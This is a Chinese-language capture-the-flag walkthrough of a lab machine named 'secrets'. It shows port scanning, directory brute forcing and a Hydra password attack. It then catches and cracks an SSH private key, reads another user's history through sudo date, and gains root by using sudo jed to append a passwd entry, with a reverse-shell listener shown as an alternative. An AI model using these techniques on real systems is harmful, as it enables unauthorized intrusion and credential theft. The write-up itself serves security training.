信息收集

服务探测

❯ sudo arp-scan -l
[sudo] password for Pepster:
Interface: eth0, type: EN10MB, MAC: 5e:bb:f6:9e:ee:fa, IPv4: 192.168.60.100
Starting arp-scan 1.10.0 with 256 hosts (https://github.com/royhills/arp-scan)
192.168.60.1    00:50:56:c0:00:08       VMware, Inc.
192.168.60.2    00:50:56:e3:f6:57       VMware, Inc.
192.168.60.217  08:00:27:f2:eb:a5       PCS Systemtechnik GmbH
192.168.60.254  00:50:56:e5:e5:eb       VMware, Inc.

8 packets received by filter, 0 packets dropped by kernel
Ending arp-scan 1.10.0: 256 hosts scanned in 2.089 seconds (122.55 hosts/sec). 4 responded
❯ export ip=192.168.60.217
❯ rustscan -a $ip
.----. .-. .-. .----..---.  .----. .---.   .--.  .-. .-.
| {}  }| { } |{ {__ {_   _}{ {__  /  ___} / {} \ |  `| |
| .-. \| {_} |.-._} } | |  .-._} }\     }/  /\  \| |\  |
`-' `-'`-----'`----'  `-'  `----'  `---' `-'  `-'`-' `-'
The Modern Day Port Scanner.
________________________________________
: http://discord.skerritt.blog         :
: https://github.com/RustScan/RustScan :
 --------------------------------------
Breaking and entering... into the world of open ports.

[~] The config file is expected to be at "/home/Pepster/.rustscan.toml"
[!] File limit is lower than default batch size. Consider upping with --ulimit. May cause harm to sensitive servers
[!] Your file limit is very small, which negatively impacts RustScan's speed. Use the Docker image, or up the Ulimit with '--ulimit 5000'.
Open 192.168.60.217:22
Open 192.168.60.217:80
[~] Starting Script(s)
[~] Starting Nmap 7.94SVN ( https://nmap.org ) at 2025-02-28 10:24 CST
Initiating ARP Ping Scan at 10:24
Scanning 192.168.60.217 [1 port]
Completed ARP Ping Scan at 10:24, 0.07s elapsed (1 total hosts)
Initiating Parallel DNS resolution of 1 host. at 10:24
Completed Parallel DNS resolution of 1 host. at 10:24, 0.01s elapsed
DNS resolution of 1 IPs took 0.01s. Mode: Async [#: 3, OK: 0, NX: 1, DR: 0, SF: 0, TR: 1, CN: 0]
Initiating SYN Stealth Scan at 10:24
Scanning 192.168.60.217 [2 ports]
Discovered open port 22/tcp on 192.168.60.217
Discovered open port 80/tcp on 192.168.60.217
Completed SYN Stealth Scan at 10:24, 0.04s elapsed (2 total ports)
Nmap scan report for 192.168.60.217
Host is up, received arp-response (0.00038s latency).
Scanned at 2025-02-28 10:24:15 CST for 0s

PORT   STATE SERVICE REASON
22/tcp open  ssh     syn-ack ttl 64
80/tcp open  http    syn-ack ttl 64
MAC Address: 08:00:27:F2:EB:A5 (Oracle VirtualBox virtual NIC)

Read data files from: /usr/share/nmap
Nmap done: 1 IP address (1 host up) scanned in 0.32 seconds
           Raw packets sent: 3 (116B) | Rcvd: 3 (116B)

扫一下目录，得到/secrets

❯ gobuster dir -u "http://$ip" -w /usr/share/seclists/Discovery/Web-Content/directory-list-lowercase-2.3-medium.txt -x php,html,zip,txt -b 403,404
===============================================================
Gobuster v3.6
by OJ Reeves (@TheColonial) & Christian Mehlmauer (@firefart)
===============================================================
[+] Url:                     http://192.168.60.217
[+] Method:                  GET
[+] Threads:                 10
[+] Wordlist:                /usr/share/seclists/Discovery/Web-Content/directory-list-lowercase-2.3-medium.txt
[+] Negative Status codes:   403,404
[+] User Agent:              gobuster/3.6
[+] Extensions:              zip,txt,php,html
[+] Timeout:                 10s
===============================================================
Starting gobuster in directory enumeration mode
===============================================================
/index.html           (Status: 200) [Size: 122]
/secrets              (Status: 301) [Size: 318] [--> http://192.168.60.217/secrets/]
Progress: 1038215 / 1038220 (100.00%)
===============================================================
Finished
===============================================================

提示入口

curl一下，发现index.html中藏有注释获得用户名brad

❯ curl $ip
I have to tell you a secret...
<!-- written by brad -->
❯ curl http://192.168.60.217/secrets/
I keep wanting to tell you a secret...
我一直想告诉你一个秘密...

在/secrets目录后再次扫描

❯ gobuster dir -u "http://$ip/secrets" -w /usr/share/seclists/Discovery/Web-Content/directory-list-lowercase-2.3-medium.txt -x php,html,zip,txt -b 403,404
===============================================================
Gobuster v3.6
by OJ Reeves (@TheColonial) & Christian Mehlmauer (@firefart)
===============================================================
[+] Url:                     http://192.168.60.217/secrets
[+] Method:                  GET
[+] Threads:                 10
[+] Wordlist:                /usr/share/seclists/Discovery/Web-Content/directory-list-lowercase-2.3-medium.txt
[+] Negative Status codes:   404,403
[+] User Agent:              gobuster/3.6
[+] Extensions:              html,zip,txt,php
[+] Timeout:                 10s
===============================================================
Starting gobuster in directory enumeration mode
===============================================================
/index.html           (Status: 200) [Size: 39]
/login_form.php       (Status: 200) [Size: 429]
Progress: 1038215 / 1038220 (100.00%)
===============================================================
Finished
===============================================================

有个登录表单

尝试随意登录下，则会跳转到MK67IT044XYGGIIWLGS9.php

Hydra爆破

利用hydra爆破下POST表单，得到密码bradley

❯ hydra -l brad -P /usr/share/wordlists/rockyou.txt $ip http-post-form '/secrets/MK67IT044XYGGIIWLGS9.php:user=brad&password=^PASS^:Invalid Credentials'
Hydra v9.5 (c) 2023 by van Hauser/THC & David Maciejak - Please do not use in military or secret service organizations, or for illegal purposes (this is non-binding, these *** ignore laws and ethics anyway).

Hydra (https://github.com/vanhauser-thc/thc-hydra) starting at 2025-02-28 10:51:28
[DATA] max 16 tasks per 1 server, overall 16 tasks, 14344399 login tries (l:1/p:14344399), ~896525 tries per task
[DATA] attacking http-post-form://192.168.60.217:80/secrets/MK67IT044XYGGIIWLGS9.php:user=brad&password=^PASS^:Invalid Credentials
[80][http-post-form] host: 192.168.60.217   login: brad   password: bradley
1 of 1 target successfully completed, 1 valid password found
Hydra (https://github.com/vanhauser-thc/thc-hydra) finished at 2025-02-28 10:51:38

登录后，发现至可以输入数字

但是无法输入正常的ip地址，不过你可以将ip转为int数值

再次尝试执行，然后启动wireshare抓包看一下

发现靶机尝试向目标ip端口6666发送数据

利用nc端口监听一下，得到私钥内容

❯ nc -lnvp 6666
listening on [any] 6666 ...
connect to [192.168.60.100] from (UNKNOWN) [192.168.60.217] 45940
-----BEGIN RSA PRIVATE KEY-----
Proc-Type: 4,ENCRYPTED
DEK-Info: DES-EDE3-CBC,478250418EF67EB4

MvfHsFbuTgPyi0PeU9dWPL8wVaIKHsuvYEIdwNJF42eDz0/L5kdoBnA8+yuWAI28
iI2jtehZHb/7PuaIsCtrzrJ0B1xXZYoeSc4Dfu2j1gi/ToaO3A6RHseHWHsjM9Qw
4AzHS13ze+EQTLHMnTu6eCADEXhwShgrHAmJpw4irdTca+wuY83n38obX0EhrXAs
E8zZfY8yMg4nuq9cP5pZ17IjvQbfk4cvfD4jNN4rXXn8WVlY5tdBH6Bg3lBoZDwD
VfNwZCmUrNIfMamNXjhMzkBNBwPXaNARokQded6c9Ie2PmdPMKPOkL/9QlM77OaE
d0xid9s1u4z2H/Q8GrODUc7eJar95bFLUySNoTiVFPqbVTvQ9tZNSWNTkQ5kgCXj
YRroAtvp0f0UdcPAOFRjsEFqQ4MqwZy26j1rhhAJQKg+q6SkyPv73kRotXajaAK3
irNHqNgzIKmkY9x9rfPTxiGw1oJyJxyNwQ3pZilih5AvI8EQBRVAN7Nb6utjDnkV
u1cjWr6ZN3lC67rhxwXZ9cub1KoQ1pwrzg0Iy1/x2d6zFHeuAkjlSeO8jkUpT1Eb
tdRdrJh712pW9vDg36VaQnrfeNVFPYmku0OXFXgsfiJ+XAJYQX+K2e4N3vRKuXSp
zH5nyL5d1r1Z+wn2s9Ial/zbhCUdOJiwZ87N7yIzCvykMnjEIPwytouWY/Ed4tq8
AqAegiMF5Y7M7+FC+ZH8EUvRCEzUPjS+T0KxgGY1KCTSUfL7QGZwQRKZ1hC879n6
ouj03SFu2VqiuMOXcs8lSjas5vyQgz4XhF58OUzi/BYrqCQBMV3W8RWviJzQvYwV
zBl5lkKsUMJ1Y4xLWBP64LnnEPRViPq7TGxYa6aTZ6rmTIe6dJORhIRVdPilGMYs
4462OpFpIYqWgKNGOJ1GMRf/juiE3J4pBwpslbefxt9SZnwnE9xHgRBInmqJgneC
38EJWyUwJqqlUSSoki3PB19KFpjy9U3YUPPF0Ff8jNg0x3FFLSFqLI4wyTPXH9+J
AalS64ttaP8PoiPxSK9oEXcj8RXVLq99Xdkq9gx25qw/Hca7wOIEUsAmjdtKYMVL
ccsaCrRsC1IMF3Wu1l4ihIwzBBA+l5ZhFIgD9hgUdtinchC3+TRI6r6Cnlbj2rB+
NrSpX7D3X1I5s15FmZuo1kkRH3xxjR1LLRuEjQkg3CTpZnUK5nDLgYo9dSnd0QzM
yOACjV6NiI1PJr7hM08OBuxd5I+FB8JyVJozQMMNoooNdvBNJvFoAXvaqqfY64fu
lYQXXEiPhOVajVGieA2tHmlLf7v6KDCqePZ+/KqxGqn+jIxsjjItCxOlW2OWxWCB
iLsB4JJ0NmKCFJh27wCvyMM1+Z8Kmt2BptCEREBHGxIkOraFBk6MN1bqBBi02UE/
C6piJetSpBUwjOOUs4hiwGRtYf5w4Hut8rsMs79/D3HsG8UPpZsrUKOcv8ZIosOg
+jOuyVfxN44ySVuB2gVVU904GHIdMRyBeR6udv/qgxabGyShoeRhUjA3PPZEDw7B
LPMDfxOmzS9h/8CEK5RHQsxt6krtooRpf5HLCczehCzWzQXKPfnXwg==
-----END RSA PRIVATE KEY-----

爆破一下私钥得到security

用户提权

利用上面的得到的用户名尝试登录一下

❯ vi id_rsa
❯ ssh2john id_rsa >hash
❯ john hash --wordlist=/usr/share/wordlists/rockyou.txt
Using default input encoding: UTF-8
Loaded 1 password hash (SSH, SSH private key [RSA/DSA/EC/OPENSSH 32/64])
Cost 1 (KDF/cipher [0=MD5/AES 1=MD5/3DES 2=Bcrypt/AES]) is 1 for all loaded hashes
Cost 2 (iteration count) is 2 for all loaded hashes
Will run 4 OpenMP threads
Press 'q' or Ctrl-C to abort, almost any other key for status
security         (id_rsa)
1g 0:00:00:00 DONE (2025-02-28 12:41) 50.00g/s 153600p/s 153600c/s 153600C/s qwertyui..dangerous
Use the "--show" option to display all of the cracked passwords reliably
Session completed.
❯ ssh brad@$ip -i id_rsa
The authenticity of host '192.168.60.217 (192.168.60.217)' can't be established.
ED25519 key fingerprint is SHA256:KGZwtmwggtu0zpCwCkOfNz+QU/CxhhYeZZQiHd8tQIc.
This key is not known by any other names.
Are you sure you want to continue connecting (yes/no/[fingerprint])? yes
Warning: Permanently added '192.168.60.217' (ED25519) to the list of known hosts.
Enter passphrase for key 'id_rsa':
Linux secrets 4.19.0-18-amd64 #1 SMP Debian 4.19.208-1 (2021-09-29) x86_64
brad@secrets:~$ cat user.txt
56a42034352d678d4e6ee235c5419cb3

用户brad拥有sudo权限可以以fabian的身份执行data

那不就是可以读文件吗

尝试读一下history，里面藏有密码

brad@secrets:~$ sudo -l
Matching Defaults entries for brad on secrets:
    env_reset, mail_badpass, secure_path=/usr/local/sbin\:/usr/local/bin\:/usr/sbin\:/usr/bin\:/sbin\:/bin

User brad may run the following commands on secrets:
    (fabian) NOPASSWD: /usr/bin/date
brad@secrets:/home$ sudo -u fabian date -f /home/fabian/.bash_history
date: fecha inválida «cd ~»
date: fecha inválida «ls -la»
date: fecha inválida «passwd fabian»
date: fecha inválida «s3cr3t$$$L0v3$$$»
date: fecha inválida «exit -y»
brad@secrets:/home$ su fabian
Contraseña:
fabian@secrets:/home$ cd ~

Root提权

同时fabian也有sudo权限

fabian@secrets:~$ sudo -l
Matching Defaults entries for fabian on secrets:
    env_reset, mail_badpass, secure_path=/usr/local/sbin\:/usr/local/bin\:/usr/sbin\:/usr/bin\:/sbin\:/bin

User fabian may run the following commands on secrets:
    (root) NOPASSWD: /usr/bin/jed

通过查看help发现jed可以修改文件

在/etc/passwd下添加一条primary:zSZ7Whrr8hgwY:0:0::/root:/bin/bash

登录密码为123456，即可拿到root

fabian@secrets:~$ sudo /usr/bin/jed -help
Jed usage forms:

0.  jed [--version | --help]
1.  jed [--batch] [-n] [-e emulation] [-a alt-jedrc-file] \
        [file ...] \            % edit files
        [-g linenumber] \       % goto line
        [-s search-string] \    % performa search
        [-l file-to-load] \     % load slang file
        [-f function] \         % execute function
        [-i file-to-insert] \   % insert file
        [-2] \                  % split window
        [-tmp] \                % do not backup buffer
        [-hook funct (argv)] \  % exec funct with rest of argv parameters
        [--ANYTHING]            % execute ANYTHING as a function

2.  jed -script FILE [arg ...]

3.  jed-script FILE [arg ...]
        This form sets __argv[0] to FILE, __argv[1] to arg, ...
fabian@secrets:~$ sudo /usr/bin/jed  /etc/passwd
fabian@secrets:~$ su primary
Contraseña:
root@secrets:/home/fabian# id
uid=0(root) gid=0(root) grupos=0(root)
root@secrets:/home/fabian# cat /root/root.txt
cfd58a2c97ff992fd7777c5e1baf8265
root@secrets:/home/fabian#

或者在里面执行shell命令

监听端口即可

❯ pwncat-cs -lp 4444
[12:58:04] Welcome to pwncat 🐈!                            __main__.py:164
[12:58:05] received connection from 192.168.60.217:47668         bind.py:84
[12:58:06] 192.168.60.217:47668: registered new host w/ db   manager.py:957
(local) pwncat$
(remote) root@secrets:/etc# id
uid=0(root) gid=0(root) grupos=0(root)
(remote) root@secrets:/etc# cat /root/root.txt
cfd58a2c97ff992fd7777c5e1baf8265